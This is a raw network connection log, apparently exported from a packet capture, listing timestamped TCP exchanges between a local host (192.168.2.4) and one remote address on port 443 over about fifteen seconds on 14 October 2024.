                                                                                    Oct 14, 2024 04:30:33.935218096 CEST50050443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:33.935236931 CEST44350050108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:34.125165939 CEST50061443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.125252962 CEST44350061108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:34.125374079 CEST50061443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.125508070 CEST50061443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.125576973 CEST44350061108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:34.125781059 CEST50061443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.179264069 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.179347038 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:34.179425955 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.179682970 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.179717064 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:34.889194965 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:34.889306068 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.891216993 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.891244888 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:34.891472101 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:34.892509937 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:34.939402103 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.147023916 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.147414923 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.147504091 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.147634029 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.147680044 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.147712946 CEST50062443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.147727966 CEST44350062108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.336627007 CEST50068443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.336683989 CEST44350068108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.336767912 CEST50068443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.336913109 CEST50068443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.337033987 CEST44350068108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.337205887 CEST50068443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.346834898 CEST50069443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.346870899 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.346963882 CEST50069443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.347353935 CEST50069443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.347367048 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.958954096 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.959105968 CEST50069443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.960274935 CEST50069443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:35.960284948 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.960535049 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:35.962048054 CEST50069443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.007422924 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:36.225256920 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:36.225595951 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:36.225667953 CEST50069443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.225976944 CEST50069443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.225991011 CEST44350069108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:36.423796892 CEST50078443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.423888922 CEST44350078108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:36.423995018 CEST50078443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.425364971 CEST50078443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.425455093 CEST44350078108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:36.425932884 CEST50078443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.445322990 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.445372105 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:36.445471048 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.445811987 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:36.445843935 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.037169933 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.037270069 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.038366079 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.038393021 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.039199114 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.040209055 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.087399960 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.290873051 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.291275978 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.291352987 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.291484118 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.291532040 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.291565895 CEST50080443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.291580915 CEST44350080108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.482839108 CEST50087443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.482923031 CEST44350087108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.483083963 CEST50087443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.483200073 CEST50087443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.483484983 CEST44350087108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.483557940 CEST50087443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.493453026 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.493503094 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:37.493585110 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.493838072 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:37.493866920 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.117527008 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.117630959 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.118572950 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.118578911 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.119679928 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.120703936 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.167479992 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.371185064 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.371673107 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.371752024 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.371838093 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.371880054 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.371915102 CEST50088443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.371931076 CEST44350088108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.613774061 CEST50095443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.613837957 CEST44350095108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.614109039 CEST50095443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.624602079 CEST50095443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.624756098 CEST44350095108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.625119925 CEST50095443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.642497063 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.642522097 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:38.642587900 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.643016100 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:38.643027067 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.322065115 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.322139025 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.323673010 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.323679924 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.324001074 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.325429916 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.371510029 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.575150013 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.575529099 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.575800896 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.575887918 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.575901985 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.575915098 CEST50096443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.575918913 CEST44350096108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.769535065 CEST50106443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.769618988 CEST44350106108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.769725084 CEST50106443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.769841909 CEST50106443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.770001888 CEST44350106108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.770164013 CEST50106443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.847428083 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.847512007 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:39.847645044 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.847884893 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:39.847918034 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.440529108 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.440623045 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.441610098 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.441637039 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.441975117 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.443428993 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.491429090 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.693774939 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.694091082 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.694252968 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.694560051 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.694560051 CEST50107443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.694626093 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.694659948 CEST44350107108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.885406971 CEST50113443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.885462046 CEST44350113108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.885529041 CEST50113443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.885618925 CEST50113443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.885783911 CEST44350113108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.885916948 CEST50113443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.895498991 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.895519018 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:40.895596027 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.895828009 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:40.895853043 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.483469963 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.483603001 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.484672070 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.484692097 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.485023022 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.486089945 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.527443886 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.737972975 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.738114119 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.738176107 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.738312960 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.738358974 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.738388062 CEST50114443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.738403082 CEST44350114108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.979659081 CEST50124443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.979754925 CEST44350124108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.979896069 CEST50124443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.980036020 CEST50124443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:41.980159044 CEST44350124108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:41.983181953 CEST50124443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.047305107 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.047389030 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.047473907 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.047700882 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.047735929 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.636589050 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.636796951 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.638149977 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.638179064 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.638962984 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.640444994 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.683450937 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.888709068 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.889103889 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.889314890 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.889441013 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.889441013 CEST50126443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:42.889482975 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:42.889513016 CEST44350126108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:43.130130053 CEST50132443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.130219936 CEST44350132108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:43.130326033 CEST50132443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.130439043 CEST50132443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.130633116 CEST44350132108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:43.130775928 CEST50132443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.201400995 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.201455116 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:43.201692104 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.201881886 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.201925993 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:43.878979921 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:43.879112005 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.880647898 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.880676031 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:43.881059885 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:43.882672071 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:43.927447081 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:44.141932964 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:44.142117023 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:44.142205000 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.142388105 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.142436028 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:44.142466068 CEST50133443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.142481089 CEST44350133108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:44.397546053 CEST50144443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.397629976 CEST44350144108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:44.397711992 CEST50144443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.409928083 CEST50144443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.410139084 CEST44350144108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:44.410214901 CEST50144443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.485721111 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.485753059 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:44.486057997 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.486162901 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:44.486172915 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.093832016 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.093914032 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.095442057 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.095447063 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.095772028 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.096803904 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.139447927 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.383740902 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.383882999 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.383953094 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.384196997 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.384212017 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.384238958 CEST50145443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.384243965 CEST44350145108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.583411932 CEST50151443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.583497047 CEST44350151108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.583600044 CEST50151443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.584055901 CEST50151443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.584122896 CEST44350151108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.584192038 CEST50151443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.595109940 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.595194101 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.595290899 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.595693111 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.595727921 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.267797947 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.267885923 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.270446062 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.270463943 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.270796061 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.274719000 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.319399118 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.522675991 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.522861004 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.522939920 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.523056030 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.523098946 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.523128033 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.523143053 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.783591986 CEST50159443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.783669949 CEST44350159108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.783857107 CEST50159443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.784327984 CEST50159443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.784430027 CEST44350159108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.784842968 CEST50159443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.803599119 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.803683043 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.803777933 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.804363966 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.804404020 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.506198883 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.506469011 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.508394957 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.508450031 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.509493113 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.511292934 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.555497885 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.762332916 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.762666941 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.762904882 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.763000965 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.763001919 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.763045073 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.763075113 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.013079882 CEST50161443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.013178110 CEST44350161108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.013335943 CEST50161443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.013511896 CEST50161443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.013907909 CEST44350161108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.013998985 CEST50161443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.035841942 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.035924911 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.036029100 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.036547899 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.036602974 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.628721952 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.628981113 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.713902950 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.713957071 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.714900017 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.716402054 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.763451099 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.883112907 CEST44350162108.170.55.202192.168.2.4
